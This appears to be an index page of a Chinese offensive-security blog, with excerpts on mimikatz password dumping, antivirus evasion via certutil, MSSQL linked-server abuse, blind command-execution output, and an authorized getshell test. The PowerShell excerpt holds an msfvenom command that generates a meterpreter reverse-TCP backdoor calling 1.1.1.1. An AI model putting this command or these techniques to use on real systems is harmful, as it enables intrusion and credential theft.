Windows获取明文密码的常见方式


Windows获取明文密码 目前网络上已经有许多获取Windows系统明文密码的方式了,且都比较成熟,所以我这里写的和那些相比就属于小巫见大巫了。 这里主要将抓取明文密码,抓Hash方法也适用,包含但不限于下述这些方法。 直接使用mimikatz 第一种比较常见的就是直接使用mimikatz抓取目标

关于执行命令时被拦截的那档子事


关于执行命令时被拦截的那档子事 因为电脑就安装了火绒,所以就用火绒实验了,360之类的应该同理。 绕过拦截 虽然这个思路我早就有,但是一直没实验;今天恰巧下载文件太慢我试试用certutil命令下载,然后执行命令的时候被火绒弹窗拦截了。

mssql数据库之dblink


MSSQL数据库之DBLINK DBLINK,翻译为中文是**数据库链接**,如同字面意思一样,就是数据库本身链接了其他的数据库,又名链接服务器,而这一配置,在MSSQL数据库中比较常见,且如果目标配置了DBLINK,则更加的有利于我们的工作。 实际工作中,可能遇到以下的利用情况: 通过SQL注入,

PowerShell一些笔记


Powershell使用 msf生成后门: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=8080 --arch x64 --platform windows -f psh-reflection -o test

关于命令执行无回显那档子事-2


通过HttpLog方式查看命令回显 基于前面写的一篇文章:【关于命令执行无回显的那档子事】 ------ 2023.4.28 update ------ 4月1号遇到的问题现在解决了,因为考虑到可能部分主机不存在curl环境,所以最终还是基于powershell来实现,实际使用中如果出现错误,则可能

Windows一些笔记


Windows笔记本 一些基本命令使用 bat中按行读取文件内容: @echo off for /f "delims=" %%i in (test.txt) do ( echo %%i ) pause # 一行 for /f "delims=" %i in (1.txt) do echo

记一次稀里糊涂getshell的测试


前言 记录一次授权的测试,这个目标是真的太难了太难了太难了,网上能查找到的信息很少,最多只能找到一些学号,职工号以及身份证来来回回找了将近一个月都没找到,心力憔悴。学校所有的域名都解析到了同一个IP地址,并且这个IP上有很强很强的防护措施(*甚至连一个单引号就直接连接重置,过分*),前期一点进展也没

关于命令执行无回显的那档子事


关于命令执行无回显的那档子事 有时候千辛万苦的拿到一个RCE的入口点或突破点,但是那个RCE点位却无法回显,导致我们执行的任何命令都看不到结果,这样非常影响我们的下一步操作。 获得回显 目前获得回显的主要方式是通过dnslog,但是个人感觉dnslog有些不完美,不可控(只是我不咋会用的原因),这样